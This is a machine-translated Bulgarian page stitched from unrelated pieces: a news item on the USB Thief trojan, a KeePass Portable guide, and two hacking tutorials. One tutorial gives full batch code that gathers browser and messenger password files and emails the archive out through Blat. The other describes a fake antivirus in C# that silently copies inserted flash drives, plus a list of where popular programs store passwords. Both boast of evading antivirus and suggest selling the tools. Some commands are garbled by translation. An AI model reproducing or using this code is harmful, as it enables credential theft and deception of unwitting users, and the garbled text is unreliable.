Изключително необичаен троянски кон: зловреден софтуер беше наречен USB Thief (Win32/PSW.Stealer.NAI). Злонамереният софтуер е фокусиран върху кражба на данни, разпространява се и работи върху обикновени флашки, а също така умело крие следи от присъствието си в системата. Троянският кон е идеален за кибершпионаж, тъй като може да достигне дори до системи, които са изолирани от мрежата, ако USB устройство може да бъде свързано към тях.
За разлика от други USB заплахи, които се придържат към стартиране и фалшифицират преки пътища на приложения, за да може зловредният софтуер да стартира, USB Thief работи по различен начин. Троянският кон е проектиран да се възползва от факта, че потребителите често съхраняват преносими версии на приложения като Firefox, NotePad++, TrueCrypt и т.н. на флаш устройства. Зловреден софтуер е добре интегриран във веригата за изтегляне на такива програми, представяйки се като плъгин или DLL файл. По този начин, когато потребител стартира познато приложение от флашка, заедно с него (на заден план) се стартира троянски кон.
Неизвестният автор на зловреден софтуер се е погрижил за сериозна защита на разработката му. USB Thief се свързва с всяко заразено флаш устройство, използвайки неговия уникален идентификатор и настройки на устройството. Някои от файловете на троянския кон са защитени с AES128 криптиране, а ключът се генерира въз основа на уникалните параметри на устройството. Освен това имената на файловете със злонамерен софтуер се различават във всеки отделен случай: те се генерират въз основа на съдържанието на флаш устройството и времето на създаване на файловете. Когато се опитвате да копирате USB Thief на друга флашка или редовно труднодиск, тази двустепенна система за защита ще попречи на злонамерения софтуер да работи и също така сериозно ще усложни обратното инженерство.
Троянска структура
USB Thief работи директно от флашката и не оставя следи върху самата система. Троянският кон се състои от шест файла, четири от които са изпълними, а два съдържат конфигурационни данни. Първият товарач е отговорен за стартирането на троянския кон заедно с преносима версия на програма. Той проверява USB устройството и се уверява, че може да запише на него открадната информация и да я съхрани тук. След това стартира вторият товарач. Той проверява имената на родителските процеси и се уверява, че работи в нормална среда (и никой не се опитва да го анализира). Третият товарач от своя страна проверява за антивируси в системата.
Последният, четвърти полезен товар, който е вграден работещ процес, е пряко отговорен за кражбата на данни. USB Thief краде документи, изображения, списък с файлове от всички налични устройства, данни Регистър на Windowsи информация, събрана от WinAudit. Всички откраднати данни се съхраняват на флаш устройство и се криптират с елиптична криптография.
Експертите на ESET отбелязват, че атаките от с помощта на USBКрадецът все още не е масова практика. Троянският кон обаче е много опасен, тъй като е трудно да се открие присъствието му и след премахване на USB устройството изобщо не остават следи от кражба на информация. Докладът на компанията също така посочва, че авторът на зловреден софтуер, ако желае, може да „преназначи“ своя зловреден софтуер, като замени полезния товар за кражба на данни с всеки друг зловреден софтуер.
В тази статия ще опиша как бързо и без много затруднения да напишете и направите вирус, който краде файлове с пароли и ги изпраща в пощенската кутия.
Нека започнем с факта, че вирусът ще бъде написан на bat "e (CMD, можете да вземете основните команди), тоест в обичайния текстов файли ще се изпълнява с помощта на стандартния, вграден в Windows интерпретатор - "команден ред".
За да напишете такъв вирус, вие трябва да знаете точното място за съхранение на тези файлове, които той ще открадне, Blat компоненти, които могат да бъдат изтеглени от външния сайт http://www.blat.net/ или от нашия сървър, т.к. както и компонент от WinRaR архиватора Rar.exe (можете и без него).
Отворете бележника и копирайте следния код в него:@echo off md %systemroot%\wincs md %SystemDrive%\pass\ md %SystemDrive%\pass\opera\ md %SystemDrive%\pass\Mozilla\ md %SystemDrive%\pass\MailAgent\ md %SystemDrive%\pass\ MailAgent\reg attrib %systemroot%\wincs +h +s +r attrib %SystemDrive%\pass +h +s +r копиране /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe" копиране /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll" копиране /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib" CD /D % APPDATA%\Opera\Opera\ копиране /y wand.dat %SystemDrive%\pass\opera\wand.dat копие /y cookies4.dat %SystemDrive%\pass\opera\cookies4.da regedit.exe -ea %SystemDrive%\ pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2 regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent_3.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\ magent_logins3 CD /D %APPDATA% Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul Xcopy Mra\Update\ver.txt %SystemDrive%\pass\ MailAgent /K /H /G /Q /R /S /Y >nul cd %AppData%\Mozill a\Firefox\Profiles\*.default\ копиране /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite копиране /y key3.db %SystemDrive%\pass\Mozilla\key3.db копие /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite copy /y %Windir%\Rar.exe %SystemDrive%\pass\Rar.exe >nul del /s /q %SystemRoot%\Rar.exe %SystemDrive%\pass\ rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\ копиране /y %SystemDrive%\pass\pass.rar %systemroot%\wincs\pass.rar cd %systemroot%\wincs %systemroot %\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u login -pw Password ren *.rar pass.rar %systemroot%\wincs\blat.exe -body FilesPassword -to [email protected] -attach %systemroot%\wincs\pass.rar rmdir /s /q %SystemDrive%\pass rmdir /s /q %systemroot%\wincs del /s /q %systemroot%\blat. exe del /s /q %systemroot%\blat.dll del /s /q %systemroot%\blat.lib attrib +a +s +h +r %systemroot%\wind.exe EXIT cls
Няма да пиша много от кода на самата Batinka.
@echo off - скрива тялото на дупето (така че не е необходимо, но все пак)
md %systemroot%\wincs - създава папка wincs в системна папка Windows, без значение на какъв диск е инсталиран или как се казва.
md %SystemDrive%\pass\ - създава папка за пропуск на устройството, където е инсталиран Windows.
md %SystemDrive%\pass\opera\ - създава папката на opera, където wand.dat и cookies4.dat от Браузър Opera(до 11* версии, opera съхранява своите пароли във файла wand.dat)
md %SystemDrive%\pass\Mozilla\- създава папка на Mozilla, откъдето са файловете Браузър Mozilla(cookies.sqlite ,key3.db ,signons.sqlite ), в които се съхраняват пароли.
md %SystemDrive%\pass\MailAgent\- създава папка MailAgent, в която ще бъдат копирани файлове, съдържащи историята на кореспонденцията и ключове в регистъра (съхраняване на пароли) от Mail Agent.
md %SystemDrive%\pass\MailAgent\reg- създава папка рег
attrib %systemroot%\wincs +h +s +r- поставя атрибути на папката wincs, като по този начин я скрива от изглед.
attrib %SystemDrive%\pass +h +s +r- същото като по-горе.
копиране /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe"- копира файла blat.exe от мястото за изтегляне в папката wincs
копиране /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll"- копира файла blat.dll от мястото за изтегляне в папката wincs
копиране /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib"- копира файла blat.lib от мястото за изтегляне в папката wincs
CD /D %APPDATA%\Opera\Opera\ - отива в папката на opera, където се намират файловете с пароли (и не само) от операта.
копиране /y wand.dat %SystemDrive%\pass\opera\wand.dat- копира файла wand.dat в папката на opera
копиране /y cookies4.dat %SystemDrive%\pass\opera\cookies4.dat- копира файла cookie4.dat в папката на opera
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2- експортира ключа на регистъра magent_logins2, където се съхранява паролата, в папката reg
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins3- експортира ключа на регистъра magent_logins3, където се съхранява паролата, в папката reg
CD / D %APPDATA% - отидете в папката AppData
Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul- копира съдържанието на папката Mra\Base в папката MailAgent
Xcopy Mra\Update\ver.txt %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y >nul- копира файла ver.txt в папката MailAgent
cd %AppData%\Mozilla\Firefox\Profiles\*.default\- отидете в папката с профила на браузъра Mozilla
копиране /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite- копира файла cookies.sqlite в папката Mozilla
копиране /y key3.db %SystemDrive%\pass\Mozilla\key3.db- копира файла key3.db в папката на Mozilla
копиране /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite- копира файла signons.sqlite в папката Mozilla
копиране /y %Windir%\Rar.exe %SystemDrive%\pass\Rar.exe >nul- копира компонента на архиватора WinRar Rar.exe в папката pass
del /s /q %SystemRoot%\Rar.exe- премахва компонента на архиватора от папката на Windows
%SystemDrive%\pass\rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\- архивирайте съдържанието на папката с пропуска
копиране /y %SystemDrive%\pass\pass.rar %systemroot%\wincs\pass.rarкопирайте създадения архив в папката wincs
cd %systemroot%\wincs - отидете в папката wincs
%systemroot%\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u login -pw Password - подготвя програмата Blat за изпращане на архива, като посочи данните за оторизация и изпращане на писмото.Не забравяйте да посочите вашите данни от пощенската кутия, от която ще бъде писмото с архива изпратено.
ren *.rar pass.rar - само в случай, че архивът не е взел грешно име по време на процеса, ще го преименуваме отново на pass.rar
%systemroot%\wincs\blat.exe -body Files Password -to [email protected] -прикачете %systemroot%\wincs\pass.rar- посочете на кой пощенски адрес ще бъде изпратено писмото и го изпратете.
rmdir /s /q %SystemDrive%\pass- изтрийте папката за пропуск
rmdir /s /q %systemroot%\wincs- изтриване на папка wincs
del /s /q %systemroot%\blat.exe
del /s /q %systemroot%\blat.dll- премахнете Blat компонентите от папката на Windows.
del /s /q %systemroot%\blat.lib- премахнете Blat компонентите от папката на Windows.
attrib +a +s +h +r %systemroot%\wind.exe- слагаме атрибути върху себе си, като по този начин се скриваме от очите.
ИЗХОД - завършете процеса на батинкиране и излезте.
cls - изчистване на изхода от всички редове в интраператора.
Копирано, записано като wind.bat и компилирано в exe с помощта на Прилеп програмикъм exe конвертор, след това събираме всичко заедно, тоест вземаме компонентите на програмата Blat и компонента за архивиране WinRar (можете да го изтеглите) и го залепваме в един изпълним файл или с някаква програма, пътят за разтоварване на всички файлове трябва бъде% SystemRoot% или% WindowsDir % или %windir% .
В резултат на това получаваме вирус, който няма да бъде задействан от антивируси и ще изпрати архив с файлове на вашата поща.Файловете, които идват на пощата, могат да бъдат декриптирани с помощта на възстановяване на няколко пароли, макар и не всички, а само пръчка .dat от операта и след това, ако не е актуализиран до 11 * версии.Всички други файлове могат да бъдат декриптирани, като ги замените със собствени.
Мисля, че това е краят, ако имате въпроси, питайте.
Благодаря ви за вниманието, всичко най-добро!
©Swap TheHackWorld.in
Много компании, включително Sony и Adobe, вече са станали жертви на хакери, които са откраднали милиони пароли и други потребителски данни. Анализът на тази информация показа, че много потребители често използват или слаби пароли като „123456“, или една и съща парола за много услуги. Това значително улеснява задачата им за хакерите и в същото време такава небрежност може да бъде разбрана: кой е в състояние да запомни повече от дузина сложни пароли?
Едно просто решение може да бъде лист хартия, залепен под клавиатурата. Нито един хакер няма да може да посегне на него, но ще трябва постоянно да наблюдавате хората, които са близо до вашия компютър. И този лист не е от полза, ако искате да влезете в акаунта си от компютъра на някой друг.
Безплатният инструмент KeePass 2 Portable решава тази дилема. За работата му е необходима само USB флашка с 10 MB свободно място, на която ще инсталирате помощна програма. В бъдеще ще трябва да запомните само една парола - от защитената зона на флаш устройството. В края на краищата, в него KeePass запазва данните за влизане във вашите уеб услуги под формата на кодирана банка данни, защитена с главна парола.
Троянските коне, които крадат пароли, няма да могат да надушат нищо. И тъй като вече не е необходимо да помните десетки пароли, наистина можете да използвате нова за всяка уеб услуга. силна парола. Сега ще ви разкажем подробно как да използвате KeePass.
Как да го направя
1 Инсталирайте сейф с парола
Инсталирайте сейф с парола
Поставете USB флаш устройство в компютъра, създайте нова папка в него и копирайте съдържанието на архива със софтуера KeePass там. Стартирайте програмата KeePass.exe. След стартиране активирайте автоматично търсенеактуализации, като щракнете върху „Активиране“ в изскачащия прозорец. След това изберете „Преглед | Промяна на езика“ и щракнете върху „Вземете още езици“.
Изтеглете файла на руски език от сайта, който се отваря, като щракнете върху „Руски | 2,25+". Разархивирайте съдържанието на архива на USB устройство. Щракнете отново върху „Преглед | Промяна на езика", изберете "Руски" и рестартирайте KeePass, като натиснете бутона "Да".
2 Създайте нова база данни с пароли
Създайте нова база данни с пароли
Изберете „Файл | Ново" и посочете USB устройството като място за съхранение на пароли. В следващия прозорец програмата ще ви подкани да зададете основната парола. Ще трябва да го въвеждате всеки път, когато стартирате KeePass.
3 Активирайте защитен режим
Активирайте защитен режим
За да попречите на троянския кон да прочете вашата парола за KeePass, трябва да използвате защитения режим на програмата, за да я въведете, подобно на UAC в Windows 7. За да направите това, в KeePass отидете на „Инструменти | Настройки | Сигурност“, преместете се в най-долната част на прозореца и поставете отметка в квадратчето до „Въведете главна парола в защитен режим“.
4 Попълнете базата данни с пароли
Попълнете базата данни с пароли
KeePass може да сортира паролите в групи. По подразбиране новата ви банка с пароли има групи като „ОС“ или „Интернет“. Да създам нов запис, изберете подходящата група (или създайте нова), щракнете с десния бутон върху бялата област отдясно и след това щракнете върху „Добавяне на запис“.
Попълнете всички полета и щракнете върху OK. Тъй като вече не е необходимо да помните пароли, за да влезете във всеки акаунт, можете да зададете нови, по-сложни, които могат да бъдат генерирани, например на passwort-generator.com.
5 Използвайте автоматично оторизиране
Ако искате да влезете в услугата с помощта на KeePass, отворете групата, където се съхранява съответната парола. Кликнете с десния бутонщракнете с мишката върху съответния запис в хранилището Пароли за KeePassи изберете „Стартиране на автоматично набиране“ от падащия списък. След това програмата ще прехвърли вашите данни в браузъра, а браузърът ще отвори нов прозорец, в който ще влезете в акаунта си.
Моля, обърнете внимание, че в полето „URL“ трябва да въведете URL адреса, който обикновено въвеждате в браузъра за оторизация, в противен случай автоматичното въвеждане на парола през KeePass няма да работи.
6 Разширете KeePass
Разширете KeePass
Ако искате да разширите функционалността на KeePass, отидете на „Инструменти | Модули | Още модули”, след което ще бъдете пренасочени към сайта с полезни разширения(нашите препоръки могат да бъдат намерени в таблицата по-горе). Сега, като щракнете върху името на плъгина, изтеглете го и го разархивирайте на флаш устройство.
Рестартирайте KeePass и отворете Инструменти | Модули. В долната част ще се покаже списък с наличните добавки (някои от тях могат да бъдат конфигурирани).
Най-добрите разширения за KeePass
Оборудвайте своя сейф с пароли допълнителни функции, например функцията Резервно копиеили предаване на парола за мобилни телефони.
Име |
Описание |
| DataBaseBackup | Задава защита на банката с пароли в случай, че USB устройството бъде откраднато или изгубено. |
| Шифър на Twofish | |
| KeeAgent | Добавя алгоритъм за кодиране, който е почти невъзможен за кракване; имайте предвид, че това ще накара KeePass да работи по-бавно. |
| KeyExchanger | Добавя алгоритъм за кодиране, който е почти невъзможен за кракване; имайте предвид, че това ще накара KeePass да работи по-бавно. |
| KeeForm | Отваря любимите ви сайтове с едно натискане на бутон и автоматично попълва вашите данни за вход. |
За обикновените смъртни флаш устройството е устройство за прехвърляне на документи / филми / снимки и друга лична (а понякога и много лична) информация. Но за хакерите флашката е едновременно жертва и средство за борба. Днес ще ви разкажа всички тънкости на неусетното източване на данни от флашки към моя компютър и също така ще ви науча как да превърнете безобидни флашки в програми за архивиране на пароли от „голям“ компютър.
Капан за чужди флашки
Идеята на програмата "Evil Computer" ще бъде следната. Ще разработим малък инструмент, който ще се представя за супер-мега усъвършенствана антивирусна програма, чиято цел е качествено премахване на „опасни“ вируси от флашки. Няма да изненадате никого с флаш устройство, заразено с вируси, така че нашият специализиран „антивирус“ няма да предизвика безпокойство у лековерния потребител. Напротив, като поставите USB флаш устройство в компютъра си и видите съобщение като: „Открит е вирус. Правя подробно сканиране на всички файлове за наличие на заразени ", - определено ще изчака завършването на тази операция.
Подготовка на инструмента
напиши така полезна програмаще сме на модерния вече C#. Гъвкавостта на езика и богатата функционалност на .NET платформата ви позволяват да разработвате приложения със светкавична скорост. Точно това ни трябва. Ние се интересуваме от реколтата, която можем да съберем, а не от досадния процес на кодиране.
Един от важните компоненти на нашето приложение ще бъде интерфейсът. Колкото по-солидно го направите, толкова по-вероятно е жертвата да не забележи уловката и спокойно да изчака завършването на антивирусното сканиране. Не се притеснявах много и поставих само картина и ProgressBar във формата на чист проект. Можете да се забавлявате и да направите умопомрачителен дизайн. Съветвам ви да разгледате дизайна на някоя истинска антивирусна програма и да проектирате приложението си в приблизително същия стил.
Ние поставихме задачата
Ще приемем, че сме решили организационните въпроси и алгоритъма на действие, време е да обсъдим техническите нюанси. Така че нашата антивирусна програма трябва да започне мръсната си работа по време на инсталирането на флаш устройството. Веднъж нов дисксе появи в системата, нашата програма трябва да определи буквата му и да започне да копира.
Преди да се заема да напиша тази статия, попаднах на изходния код на такава програма. Авторът на примера определи наличието на флаш устройство, като периодично изброява всички дискове за наличие на устройство от типа " сменяеми носители". Първоначално мислех да тръгна по същия начин, но вътрешен глас ми подсказа ирационалност. След като претеглих всички "плюсове" и всички "е, това е", отхвърлих тази идея и отидох на разходка в MSND. Пет минути по-късно се оказа, че съм го направил с основателна причина. Отговорът е намерен!
Без WinAPI никъде ...
Най-ефективният начин да разберете за свързването на ново оборудване (в нашия случай флаш памети) е чрез улавяне и анализиране на съобщението WM_DEVICECHANGE. По време на инсталирането на устройството съобщението се изпраща до всички прозорци и ние можем лесно да го обработим в нашето приложение. За да направите това, достатъчно е просто да опишете функцията WindowProc. На практика изглежда така:
LResult CALLBACK WindowProc (HWND hwnd, //идентификатор на прозорец UINT uMsg, //идентификатор на съобщение WPARAM wParam, //възникнало събитие LPARAM lParam //указател към структура, съдържаща данни)
В тялото на функцията трябва да сравните стойността на параметъра WParam с идентификаторите на различни събития, свързани със съобщението WM_DEVICECHANGE. За нашия пример те биха били:
Добре, знаем как да установим факта на свързване на ново оборудване, но как да сме сигурни, че сте свързали USB флаш устройство? Има много hot-pluggable устройства (говоря за usb) (принтер, скенер, модем и т.н.). За щастие този проблем се решава доста просто. Използвайки параметъра LParam, можем да се позовем на структурата _DEV_BROADCAST_HDR, която има поле dbch_devicetype. Тук, въз основа на стойността на това поле, се правят съответните изводи. Ако е равно на DEV_DEVTYP_VOLUME, тогава е време да се радваме и да пляскаме с ръце - към нас е свързана флашка!
Typedef struct _DEV_BROADCAST_HDR ( DWORD dbch_size; //Размер на DWORD структура dbch_devicetype; //Тип устройство DWORD dbch_reserved; //Резервирано, не се използва )DEV_BROADCAST_HDR, *PDEV_BROADCAST_HDR;
В нашия pisyuk беше поставено USB флаш устройство - нека се опитаме да разберем буквата на устройството, която системата му е присвоила. Както в "Полето на чудесата", можете да го познаете, но е по-добре да изтеглите информацията от структурата DEV_BROADCAST_VOLUME.
Typedef struct _DEV_BROADCAST_VOLUME ( DWORD dbcv_size; //Размер на DWORD структура dbcv_devicetype; //Тип устройство DWORD dbcv_reserved; //Запазено DWORD dbcv_unitmask; //Битова маска на буквата на устройството WORD dbcv_flags; // )DEV_BROADCAST_VOLUME, *PDEV_BROADCAST;
От всички полета в тази структура, ние се интересуваме от dbcv_unitmask. Имайте предвид, че това свойство съдържа само част от буквата, а не нейното символно представяне. Например, ако стойността е 0, тогава буквата на устройството ще бъде A; ако 1, тогава B и т.н. За удобство при получаване на символна буква е най-добре да напишете функция.
Ако четете нашата колона от дълго време и сте запознати с API функциите, тогава няма нужда да четете следващата част от статията. Отворете редактора и започнете да извайвате приложения. Описал съм всички необходими структури и функции; просто трябва да ги съберете в програмата. Вземете решение и аз ще започна да се гмуркам в .NET и C # по-специално.
Да ударим .NET "ом
Време е да започнете да практикувате и да приложите знанията си върху езика C#. "Какво за Бога? - ти питаш. - Говорих половината статия за WinAPI, но след това просто глупаво реших да издам извикване на всички функции под формата на собствен код? Къде е заявената светкавична скорост на развитие?
В нещо си прав. Нашето приложение наистина ще използва WinAPI функции (не по-лесен начин), но ние няма да ги описваме сами. Много разработчици са изправени пред проблема с определянето на флаш памети. В резултат на тези сблъсъци започнаха да се появяват безплатни класове за C #, в които вече е внедрена цялата необходима функционалност. Просто трябва да свържем такава заготовка (компонент за четене) към нашия проект и да извикаме няколко метода. Сега ще използваме един от тези класове. Но познаването на структурите, описани по-горе, определено ще бъде полезно при пренасянето на тази програма към Windows API.
Има много готови класове, които решават такива задачи, но най-много ми хареса версията на Jan Dolinay. Този човек написа много лесен за използване и разбираем клас DriveDetector, който може:
И най-важното е, че този клас е изключително лесен за работа - ще видите това сега. Свързването на клас към вашия проект се извършва по стандартен начин и няма смисъл да се спираме на това. Така че нека да преминем към инициализацията. Прави се така:
FlashDriveDetector = нов DriveDetector(); flashDriveDetector.DeviceArrived += нов DriveDetectorEventHandler(OnDriveArrived); flashDriveDetector.DeviceRemoved += нов DriveDetectorEventHandler(OnDriveRemoved);
След инстанциране на обект от класа DriveDetector, дефинирам манипулаторите на събития DevieArrived() и DriveRemoved(). По името им не е трудно да се познае за какво отговарят. Целият код за инициализация е най-добре написан в метода Form1(). Основният код на нашата програма ще бъде в манипулатора на събития DeviceArrived. Можете да видите неговия текст в страничната лента:
String dirName = Environment.GetCommandLineArgs() + "flash_" + DateTime.Now.ToString("dd-MM-yy-hh-mm-ss"); CreateDirectory(dirName); xDirectory flashcopier = нов xDirectory(); flashcopier.IndexComplete += нов IndexCompleteEventHandler(IndexComplete); flashcopier.ItemCopied += нов ItemCopiedEventHandler(ItemCopied); flashcopier.CopyComplete += нов CopyCompleteEventHandler(CopyComplete); flashcopier.Source = new DirectoryInfo(e.Drive.ToString()); flashcopier.Destination = new DirectoryInfo(dirName); flashcopier.Overwrite = вярно; flashcopier.FolderFilter = "*"; flashcopier.FileFilters.Add("*.doc"); flashcopier.FileFilters.Add("*.xls"); //Дефиниране на други филтри //.... flashcopier.StartCopy();
В самото начало на списъка определям пътя до папката, където ще копираме съдържанието на флашката. Ще копираме в директорията „flash_current date“, разположена заедно с папката, от която се стартира нашето приложение - по-удобно е. След като избрах име на папка, се опитвам да я създам с помощта на функцията CreateDirectory(). Написах тази функция единствено за удобство. Той създава екземпляр на обекта DirectoryInfo, предназначен да работи с директории, и извиква неговия метод Create (), който създава нова папка.
След като създадете папка, можете да копирате. Копирам всички файлове, използвайки обект от тип xDirectory. Ако въведете сами кода от списъка, тогава, когато се опитате да компилирате, компилаторът ще генерира грешка, в която ще пише черно на бяло: "Обект от този тип не е намерен."
Въпросът е, че xDirectory е клас на трета страна. Преди време го намерих в интернет и оттогава често го използвам в моите проекти. Харесва ми, защото е достатъчно да се извика един метод за копиране на подпапки. Освен това ви позволява да задавате филтри.
Наистина без него. Взимаме стандартни класове, техника, добре позната на всички програмисти - рекурсия - и пишем няколко дузини редове код. Уви, абсолютно не искам да правя това. На двора е 21-ви век, трябва да оптимизираме действията си максимално и xDirectory ще ни помогне в това.
Модулът с класа е на нашия диск, а за предназначението на методите/свойствата/събитията можете да разберете, като разгледате съответната таблица.
свойства на класа xDirectory
Методи на класа xDirectory
Опитайте да стартирате нашето приложение и поставете флашка. След няколко секунди (в зависимост от бъркотията на вашето флаш устройство) цялото съдържание на usb устройството ще бъде прехвърлено в папката, от която сте стартирали прясно изпеченото приложение.
USB грайфер
Сега нека разгледаме обратната задача и да поговорим за нюансите на създаването на т.нар. устройство за грабване на флашка. Принципът на създаване е абсолютно същият. Трябва да напишете просто приложение, което автоматично ще се стартира след инсталиране на флашката.
В процеса на работа приложението ще премине през папките / ключовете в регистъра, в които популярните програми съхраняват запазени пароли и, ако е възможно, ще копират цялата информация в една от техните папки. За да не предизвикате подозрение у лошия потребител вашият автозапуск, постарайте се внимателно да го прикриете. Например под менюто за стартиране.
Вероятно знаете, че сега станаха много популярни така наречените преносими версии на приложения, тоест програми, които могат да работят директно от флаш устройство. Това е най-добрият начин за игра. Проектирайте програмата в подходящ стил и за достоверност добавете няколко бутона, предназначени да стартират всякакви програми. Моят дизайн е показан на снимката.
Как ще грабим?
Веднага трябва да кажа, че тук няма нужда да извършвате суперхакерски действия. Повечето програми съхраняват лични данни в папката Documents and Settings\User\Application Data\%ProgramName% или в системния регистър. ProgramName означава всяка програма. Ако се сблъскате с първата опция, тогава ще трябва да използвате вече познатия клас xDirectory (или стандартни методи за работа с файлове) и да копирате всичко необходимо с него. Във втория случай ще трябва да работите с регистъра. Няма да дам пример за копиране на файлове (вече го разгледахме), но ще ви покажа как да взаимодействате с регистъра с помощта на .NET инструменти (използвайки примера за определяне на пътя до папката TC):
RegistryKey readKey = Registry.CurrentUser.OpenSubKey(" софтуер\\Ghisler\\ Total Commander"); ключ на низ = (низ) readKey.GetValue("InstallDir");
Това е всичко. Няма да има повече код. Тези знания трябва да са ви достатъчни, за да изтеглите файлове с ценна информация. За да направя нещата малко по-лесни, подготвих списък с най-много популярни програмии нарисува всички начини, по които съхраняват запазените потребителски данни.
Пощенски агент
Messenger от Mail.ru вече е много популярен сред простосмъртните потребители (особено сред жените). Целите са ясни, задачите са поставени, затова ни интересуват:
gTalk
Търговско дружество Googleсъздава удобни и функционални продукти, сред които има gabber клиент - gTalk. Днес gTalkвсе още не е много популярен. Не е инсталиран на всеки втори компютър, но понякога все още се появява и, за да бъдем в темата, е по-добре незабавно да научим нашата програма да получава пароли и от този месинджър. Паролите за всички gTalk акаунти се съхраняват в регистъра - HHEY_CURRENT_USER\Software\Google\Google Talk\Accounts . Този клон изброява всички акаунти, в които някога сте влизали gTalk. Паролите за акаунти се съхраняват в низов параметър pw.
Total Commander
Total Commander- безспорно най-популярният файлов мениджър. Програмата съдържа приблизително вагон и малка количка (като същия номер може да бъде прикрепен към нея с помощта на допълнителни добавки). Интересуваме се само от вградения FTP клиент. Използва се от мнозина и паролите, разбира се, се запазват.
TC, за разлика от много други програми, не съхранява пароли в системния регистър, а използва добрите стари ini файлове. Пароли, както и всички необходими данни за свързване към сървърите (ip, порт, потребителско име и др.) Total Commanderсъхранява във файл wcx_ftp.ini, който се намира невинно в папката на програмата. Път до директорията, в която е инсталиран Total Commander, можете да разберете от регистъра. Погледнете в клона HKEY_CURRENT_USER\Software\Ghisler\Total Commander.
firefox
Днес браузърът не е просто програма за WEB пътуване, а цяла комбинация, която освен различни възможности, съхранява и много поверителна информация. Типичен пример за това са уеб формулярите. 99% от съвременните сайтове изискват регистрация. Запомнянето и постоянното запазване на комбинацията за вход / парола за всеки сайт е нереалистична задача, особено ако сте напреднал потребител и сърфирането в Интернет не се ограничава само до Odnoklassniki и VKontakte.
Разработчиците са улеснили живота на потребителите и са вградили в програмите така наречените "пароли за съхранение". Регистрирах се, влязох с моя акаунт, наредих на браузъра да запомни идентификационните данни - и забравих. Следващият път, когато посетите, остава само да направите няколко щраквания на мишката и вече сте на сайта. Тъй като браузърът запазва пароли, това означава, че имаме възможност да откраднем цялата му база данни.
Всички тези файлове се намират в познатия документ и настройки\%UserName%\Application Data\Mozilla\FireFox\Profiles\%ProfileName% .
Опера
Опера- браузър, който е много популярен сред руските потребители. Естествено, не можем да го оставим без надзор. Така че с Opera ситуацията е почти същата като с FireFox. Всички пароли, записани в браузъра, се съхраняват в Document and Settings\%UserName%\Application Data\Opera\profile във файла wand.dat. Оказва се, че когато Opera бъде открита, ще действаме по същия начин, както в случая с firefox.
Skype
Популярността на Skype нараства всеки ден. Много хора го използват не като средство за провеждане на разговори, а за банален удобен чат. Всички поверителни данни, както се очаква, се намират в потребителския профил (на същото място, където ги съхранява Opera или FF). За да ги "приватизирате", ще трябва да копирате потребителския профил от Document and Settings\%userName%\Application Data\Skype\ и да експортирате клона на регистъра - HKEY_CURRENT_USER\Software\Skype\ProtectedStorage .
QIP
Както повечето програми, описани по-рано, QIP съхранява всички запазени пароли в Application Data\qip.
Копирането е завършено
.NET технологията значително опрости нашата задача, в резултат на което цялото кодиране беше сведено до извикване на няколко метода. Разбира се, можете да кажете, че това не е готино и че такива неща са много по-ефективни за писане в WinAPI или ASM "e. В някои отношения съм съгласен с вас, но имайте предвид, на WinAPI и особено на Asma , напиши такава програма като тази, но няма да успееш бързо. Докато другите пишат километричен код, ние с вас ще жънем. Успех в програмирането и ако имате въпроси, моля, пишете на сапунката.
Не забравяйте, че много потребители съхраняват поверителна информация в папката "Моите документи". Като минимум може да има интересни работни документи, а понякога и цели файлове с пароли. По едно време (на предишната ми работа) намерих на компютъра на счетоводителя спретнато форматиран файл с пароли за банкови клиенти.
Като истински приятел трябва да помогнете на всички тези хора да архивират чувствителната си информация.
Много хакерски форуми имат много реклами за продажба на този вид софтуер. Различни цени - от 10$ до 100$. След като финализирате примерите, разгледани в статията, можете да спечелите коричка черен хляб с хайвер. Повтарям, основното е да се подходи творчески към въпроса и всичко определено ще се получи. Отново не се открива от антивирусите;).
Внимание!
Ние използваме тази програма изключително за своевременно архивиране на съдържанието на флаш устройства на диск и архивиране на пароли на флаш устройство. И какво си помислихте? Незаконното използване на такъв софтуер е наказуемо!